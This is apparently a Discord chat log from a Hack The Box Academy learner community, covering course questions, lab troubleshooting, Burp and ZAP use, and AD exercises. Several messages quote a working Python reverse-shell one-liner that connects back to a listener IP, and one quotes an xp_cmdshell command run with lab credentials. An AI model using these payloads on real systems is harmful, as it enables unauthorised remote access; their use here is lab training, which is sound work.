they are tier 3 modules after all, not intro

cool, look forward to them

Sure, a lot is explained. But it helps a lot if you already have good knowledge.

i.e. you know your way around the syntax and can generally read and understand what the code is doing

I saw your avatar in my kids movie

I mean CBBH requires a basic understanding about how stuff works before taking the path too

CWEE is more in-depth

that's why i said basic mastery, not basic understanding

It is also about writing your own PoC scripts and patches. Not just being able to read and understand the code.

Yeah it goes deep. I’m at advanced serialization. Still trying to get dnSpy to work on my vm

you know your way around writing a simple script

that is daunting, but also very cool.

What's your VM?

that's just part of WhiteBox testing

usually when given a whitebox code to review they want to understand how it can be broken

does the CBBH require any written scripts? havn't seen any yet almost 50% in

Running a windows 11 vm on Mac with Apple Silicon with UtM

i like this Bunny 💚

no

No

My daughter doesn’t like him in the movie. Says he is rude

you can read what is required for cbbh in the pinned link in #cwes @dusky gyro

ah ok, so the medium modules are more easy/medium then some of the medium boxes off app.htb that ive seen require custom scripts

Boxes and academy are totally different

Boxes want to be owned while CBBH doesn’t require to own the box

thanks, will take a look

Boxes are just exercises

yeah CBBH is about scraping the surface of app vulnerabilities

ya I realized that after doing the blurry box and stopping at root flag :/

the web challenges and challenges in general would be closer

I know what she means. That's exactly what I like about him

Hahah 🤣

To what extent does CBBH aim to teach you? How deep does it go?

My kid loves that movie though. Wants to watch it almost every day

Teach what?

The course

Read here: #cwes message

So intermediate

All depends on your knowledge

oohh... this looks promising 👍

finished the ZAP Fuzzer. That was very difficult as its really not discussed on how to fuzz md5 hashes

interesting concept though

I am trying to run a reverse shell for this module section)https://academy.hackthebox.com/module/145/section/1300) and I keep getting a 'connection refused' error". I am using the correct IP address too.

"The target is vulnerable to blind SSRF. Leverage this blind SSRF vulnerability to interact with internal.app.local and achieve remote code execution against the internal service listening on port 5000, as you did in the previous section. Submit the kernel release number as your answer (Answer format: X.X.X-XX) "

https://academy.hackthebox.com/module/145/section/1300

||export RHOST="10.10.14.58";export RPORT="5000";python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'||

just checked, and it has a student option too!

https://caido.io/student-plan

unfortunately, i'm not a student anymore 😅

did you use your student email for HTB? you can sometimes still get access to your old email if you went to uni/college

though understand if thats too much hassle. i saw you need to show proof of enrolment and i really cant be bothered doing that right now. too much effort hahha

i graduated in 2002 🤣 i doubt that email is still working

haha maybe not 😉

i graduated in 2007 but i found i still had access to the library/article search in 2017 lol

surprised me tbh lol

wow, that's nice!

Hi, I am doing the final exercise of Privileged Access module: https://academy.hackthebox.com/module/143/section/1275. However, when I run the same query given in the reading section, I get Connection Failed error. Sometimes, the query just hangs and nothing can be done in that powershell session. Why is this happening?

there are lots of commands you'll need to be more specific

I am trying to run the query xp_cmdshell whoami

your command is incomplete

there's nothing in your query parameter

I blurred it out lol, thinking it would be spoiler

However, I am using trying to execute whoami command in the system using xp_cmdshell

you can try changing regions or something, your query is probably wrong though

Will try that.

Hello friends! I hope you're well. When I was going through the course, at the beginning I could catch a shell on bm Kali, I'm sure. Maybe that was THM actually. Anyhow. I used Pwnbox for any rev shell stuff through the course as I couldn't catch a shell on Kali. I assumed it was a firewall issue as I had UFW. Recently had time and did a clean install of Kali but still no shell. I start a nc listener as always, use tun0 IP address at the top right of my screen. But never catch anything. Is there some routing I have to do or something?

Hi, can someone pleasee guide me in the right direction...I need to fingerprint a website on htb but it keeps giving error "could not resolve host" when I try to use curl

What exactly have you tried? Is it a Docker container? Did you use the port then?
Otherwise, are you connected to the VPN?

yea Im connected to vpn and here is the vhost app.inlanefreight.local

ive tried "curl -I " followed by that vhost

local cannot be resolved publicly. Have you created an entry in the hosts file?

how do I do that?

sudo nano /etc/hosts?

yes

okay thanks, but it gave me two vhosts with the IP

so which ones should I put for one IP that it gave?

you can also enter two vhosts

okay hold on let me try

I tried changing the VPN regions. But I still get the same error. Why do you say the query is probably wrong🤔? I am using the following command:

Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query "xp_cmdshell 'whoami'"

10.10.10.10 vhost1.example.com vhost2.example.com

is this okay

thanks 😄

Always delete everything you don't need. Entries in the hosts file can quickly lead to errors, which you will then spend a long time finding...

Why is this happening? 😭

Which module and which section is this from?
When I have worked through the module, I can look it up in my notes

how do u determine a cms of a website using nikto or curl?

Why don't you just open the page and see what kind of page it is?
Take a look at the source code. You will often find hints there

Cannot access hack the box from firefox

How to do

open firefox
type in: www.hackthebox.com

Not i can

The problem is definitely not with firefox.

Do you have access to the Internet?
Is hackthebox.com blocked somehow?

Hi, hoping someone c an help me. I am new to HtB
trying to do HtB academy module, using Kali to connect to vpn and attack the target
without using pwnbox
But for some reason, pwnbox works successfully while my own VM says host unreachable / ports closed

#general message

thanks

I am doing last exercise of "Privileged Access" section of "Active Directory Enumeration & Attacks" module.

I am doing last exercise of "Privileged Access" section of "Active Directory Enumeration & Attacks" module.

I logged in like this at the time

┌─[✗]─[htb-student@ea-attack01]─[~]
└──╼ $mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth

You are trying to log in with your username/password. Try it with windows-auth

I see. So, I was not able to login due to the different authentication mechanism?

I mean When using the previous PowerUpSQL command, it was using SQL authentication right? Instead of windows authentication

Yes, you are using SQL Server Authentication with the command on your print screen

https://learn.microsoft.com/en-us/sql/relational-databases/security/choose-an-authentication-mode?view=sql-server-ver16

https://academy.hackthebox.com/module/110/section/1086

Module - Using Web Proxies, Section - ZAP Scanner

I need some help. I did the Spider scan as per the section. Then did an 'Attack' and find a high/critical for ||Path Transersal but can't seem to figure out how to get the flag from there.||

I'm unsure how you use the exploit from here, and the section doesn't explain it. ||I went to the link to OWSAP (https://owasp.org/www-community/attacks/Path_Traversal) but the examples they list don't seem to work for me.|| I know i'm missing something simple. Am I meant to send in new Requests in ZAP to get what I need?

it should have been a different vulnerability 🤔

i'm re-running it all. I think I found another but will wait for it to complete ...

been scanning for 43mins, so half of my target time is already up, and the scan is only half-done. lol

i think there's a part in the scanner that checks for all XSS problems. that one takes forever.

reading some manga while i wait for the scan to complete 😆

yea just got past XSS, that took 20mins alone lol

for ppl who already finish the previous API module , they will get access for this for free #academy-announcements message ?

No, API Attacks is a new module

what they mean by Will be replacing Web Services & API Attacks soon,

I think that the Web Services & API Attacks module will be removed at some point

I thought is just update like web recon

The module would then have been overwritten. Both modules are currently active

did you ajax spider the thing?

make sense , ty

nah, just the normal Spider first. Then active scan.

well my VM has just frozen .... so i guess i have to do it all again ... fml. do you suggest ajax spider instead?

Just finished AD Skills Assessment Part 1. That took an entire day lol 💀

congrats mate! i only finished part 2 the other day ... what a whirlwind lol

the course says to normal spider and then ajax to get more results. I think I remember we find the same vulnerability as the course example.

ah, gotcha

the section shows a lot being done in the hud, but tbh i can't get the hud to show everything

did you use the exploit through the HUD ?

hud doesn't work for me all the time. seems like a stability issue to me

yea could be. at least i'm not the only one

this will be the 4th time i try and do the active attack/scan. i hope i get through it all this time lol

but to be fair, when it does work, it's actually quite nice.

no, it wasnt working for me when i did the module

i haven't seen it work when there's anything major to be doing, so I cant comment lol

anyone else having issues spawning targets?

F1nd1ng W1ndows Ev1ls . hav1ng error on DotNetProvder .

not on my current module.

Hi, im new.

i do not understand what you are trying to do.

got it! had to reset my scans many times. took almost an entire day to get the vuln but a few minutes to execute it for the flag. lol

Hi, can someone help me?

with?

https://dontasktoask.com

First for what is this server.

read #welcome

K, thanks.

2. Why i cant type in general?

[07.06 03:47:45] mstsc.exe (1168) *64 - 172.16.6.155:3389 error : Could not connect to proxy 127.0.0.1(127.0.0.1):1080 - connection attempt failed with error 10061 I keep running into this error and it will not let me connect when following the setup for the RDP and SOCKS Tunneling with SocksOverRDP
lab, any ideas on what may cause this error? I have run the server.exe file and set the proxy to 127.0.0.1:1080 in the Proxifier

same reason as my previous reply

3. How to get role- like noob hacker & others?

did you try to google the error connection attempt failed with error 10061 it might give you a better answer as you know your context

Its an error in the proxifier itself, I tried to google this but was not having much success as of yet but I'll keep digging!

@fathom pendant help.

all roads lead to #welcome

.

read that channel in its entirety

But i cant read.

all your questions can be answered by reading and following #welcome

that's not my problem

Jk.

maybe this will help
https://www.proxifier.com/docs/win-v3/errors.htm

I looked in there it didn't help as I am able to connect when the proxy was not set but without proper access now with the proxy all condifured I started getting this error

@arctic karma i take it you followed all the steps as outlined in the module and got all the success popups and got the tools running properly

I am not getting the popup for some reason when connecting to the final host

note: Proxifier is meant to run on the first host

i suggest restarting the target; and going through each step with a fine toothed comb

making sure you get the same messages as the examples

https://tenor.com/view/he's-a-hero-juan-pablo-raba-freelance-he's-a-champion-he's-a-savior-gif-14016651651791301438

Thank you! haha was setting up proxifier on the wrong host!

it's why i said read the instructions carefully

https://academy.hackthebox.com/achievement/1346583/110

gg

it was interesting! i definitely need more practice with burp though

I also still get the connection refused error when I try to run the payload on my own machine

are you running this in the remote environment?

are you running a listener on the specified port?

Is there any sort of trick to get more modules?

quick question about "Password Attacks Lab - Medium" in Password Attacks, so I found a ssh key in a certain user's directory but I was wondering why that ssh key was able to log on to the roots account? I thought it should only work for that user that the key was found in? unless I'm missing something

pay money

reused keys; the user might be an admin and they insecurely used the same key

also think: why was it password protected?

sometimes things require logical leaps

ahhh true that was one of the key points of the previous lessons, thanks

Ain't got moneh

that's too bad then

the only way to get cubes to buy more modules is to pay money (buy one of the handful of subscription models) ¯_(ツ)_/¯

I'm having difficulty upgrading a non-interactive reverse shell sometimes and I think it has to do with ZSH. I haven't had any luck figuring this out. Generally this is the procedure I'm following.

# once the initial reverse shell is established ctrl-z so you're on your native shell and
$ stty raw -echo; fg
# now back in the reverse shell
$ export SHELL=bash
$ export TERM=xterm (or whatever your local $TERM is)
$ stty rows XX cols XXX

But as you can see things aren't quite right. Anyone run across this see what I'm doing wrong?

I get line feeds without carriage returns. 🤨

Ooh! Hey, I think I got it.

# toggle onlcr to better handle how the line termination works
$ stty raw -echo onlcr

I'm on the Hunting Evil with YARA section of CDSA, It asked me to find hex values associated with "Sandbox Detected". I've found what I believe the corresponding values, but there are several lines of hex keys and I've tried every combinatinon of them with no spaces and I can't get the answer right. Does anyone have any tips? How do I know which part directly translates to the phrase it's looking for?

I couldn't explain why that works very well, but rubber ducking the situation gave me some ideas for googling

Also, I don't know how to post an image to show my problem. Please help, thank you!

Read and follow #welcome

I ran the command on my locate vm with the netcat listener ''nc -lvnp 9090" and it made a connection. The module section says I should run an encoded payload twice and I am not sure if they mean run the (export RHOST="10.10.14.58";export RPORT="9090";python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'’ ) command again.

my net cat listener established a connection, when I run the ifconfig command, it shows information from my local machine

These are the hex values I found, but I tried the two corresponding lines and several other combinations and nothing worked. Please help, thank you!

Not sure for the second time around, I save the following text the screenshot(from the module section) in an html file and then upload that html file or what

Hi ya, has anyone completed Windows Evasion ?

This works for me when adjusted slightly. If I copy-paste your command as-is and run it on the target machine I get an error

SyntaxError: invalid character '’' (U+2019)

Removing the ` or ' at the end fixed it. You only need to run that once to establish a reverse shell.

Been stuck on Task 3, the flag.txt is not being generated like the question suggests

Task 3? Is that try hackme?

I meant the "Static Analysis" session

your project needs to be configured excatly the same as the section

So you ran the command in the web broswer of the target machine?

I ran the command in a bash prompt on the remote system. If you're running it through a web shell and encoding it first maybe the extra apostrophe was a mistake when copy-pasting into here or maybe you do have something goofy in there causing your issue.

how did you open the bash prompt on the remote system?

I'm not on your challenge. I was just testing the command. I have control of the other box in my situation.

Got it thanks, seems like it does more than Defender checks

Same issue here, can I DM?

Sure

Hiya! Anyone here familiar with BurpSuite?

I'm having trouble getting it to connect to the target IP in the pwnbox. ZAP connects to the target but Burp won't, so I'm wondering if there's a setting I'm overlooking or something I need to configure.

You trying to run both at the same time?

No

Quick question on FFUF. I am in the recursive module and it works just fine, but what is all this output at the top? I just would like to understand what it is and why it is there.

That wouldn't work. They're both setup to use the same port I believe.

Also, I don't even get an error message. It just continually tries to connect. It's been about 5 minutes or so and it didn't even timeout.

Oh gosh, I just turned "Intercept" Off, and now I can connect to the IP. That's odd. Shouldn't I be able to connect with intercept on?

Intercept allows you to modify/ review requests before they are sent

Yes, that's what I'm trying to do.

did a request come through burp? if it did, you have to click the Send button or whatever

You have to approve each one

yea approve

if it's loading forever that probably means you have to approve a request

okay thank you, how do i approve it?

Also, is there a way to prettify FFUF output? a lot of noise in the output

on the intercept page there's a button that i think says "Send"

ok it's Forward

i'm getting dementia

its okay, i thought it was approve

those are comments in your file

that worked! thank you so much! I do have one more question

oops, nevermind, i figured it out

Yeah thats what I figured, but they still pop up as 200. wonder why

@dim wolf thanks so much for your help! I was trying to do this module last night and was stuck for at least an hour so I figured I'd take a break and try again today. Really appreciate the help. In all the googling I did searching for answers I never did figure it out.

thank you @shut quest

Hi about broken authentication - attacking session tokens - the first question what is the answer : A session token can be brute-forced if it lacks sufficient what?
Any one can help me please ??

Does anyone know of any good tutorials for ZAP? I feel like the Web Requests module isn't quite enough for me and I'd like to learn more. But all the videos I found are either very old, or hard to understand. And the documentation from ZAP isn't the greatest either imo.

We aren't supposed to just give away answers

But lead you in the right direction so you can figure it out yourself

i would rather just use burp over zap

Its to anchor somewhere in the document, so you can go to a spot in the page loaded

unless you prefer zap

You know, I considered it but being that ZAP is free, I figured I should probably get comfortable using it instead.

A session token can be brute-forced if it lacks sufficient what? # broken authentication

Can any one help me??

burp is also free, you don't really need burp pro for it to be good

you should use burp more imo, it's the standard for web pen and most companies use it

it just rate limits fuzzing attacks and whatnot

No? I'm really new so I don't quite understand the paid features yet and if I would ever need them or not. But I looked at the price and it was really expensive, like $500 I want to say? So thought I'd try zap instead. If I really don't need Pro, then yes, I feel like Burp is way easier to use.

for anything you're going to learn in the academy burp community is just fine

[👍🏻

i came across this though. this plugin works on burp CE. it's a little harder to use than the conventional Intruder, but it does get over the throttling.
https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack

Are you talking to me? If so, I'm so new to web proxies that this is still way over my head lol

or just use ffuf 🙄

yes, or anyone who wants to use burp CE to fuzz stuff quickly.
i use ffuf too if the query is not too complex.

Whatever happened to the react button? I wanted to react to a message with an emoji but there is no react button in the menu. I've been away from Discord for a while. Did something change?

Thanks, I'll save the link for when I get fuzzing.

mouse over the message and you'll find the react options at the far right 🙂 not very intuitive

Don't you have to have Burp Pro to use extensions?

not all extensions require burp pro

some extensions can be used without pro

Yes, it's not there though for me. Maybe some restriction because I'm new to this server? idk\

#welcome <-

Ha! thanks! Didn't realize I needed to put in my account identifier

this is likely answered in the reading

Oh hi marcie! I finally figured out why I couldn't connect to the IP in Burp last night. I didn't realize I had to forward the request after entering the IP in the browser. So simple and it had me stuck for at least an hour haha

@zenith dome I did not ask you to DM me

I looooove burp

that's the proxy interceptor btw, you can turn it off if you don't want to keep forwarding

oh good, glad you do because I'm really struggling to figure out how to use it haha! I do have another question about it

*burp pro

I entered the target IP in the Burp browser, forwarded the request in Burp to get the page to load. Then I had to enter some info on the webpage which I did, and then I forwarded the request again in Burp. Now I'm supposed to edit some of the HTML in the response. But I can't figure out how to do that. Or rather, where do I go to look at the HTML response?

Yes

should be in proxy settings

^

Oh thanks! I did not know that.

there's a checkbox to intercept packets you send

sorry packets that you receive

both*

there's one for each

yes both but the one to receive is not checked

Yes, I checked the box to intercept the response. But I don't see the response.

you check it and you should be able to get the responses

you don't get a packet with something like 200 OK?

forward slowly until you get the response from the examples

this module is very much a follow along

I do see the packets in the browser itself. I'm sorry, I don't know why I'm having such a hard time here. I don't ususally struggle to understand a concept this much.

the requests are in the burp intercept tab

Yes, this is exactly what I'm trying to do. I'm going through it a line at a time and attempting to duplicate what I see in the module. But in the module, after they intercept the response, there is a picture where you can see the page's HTML. However, I don't see this on mine.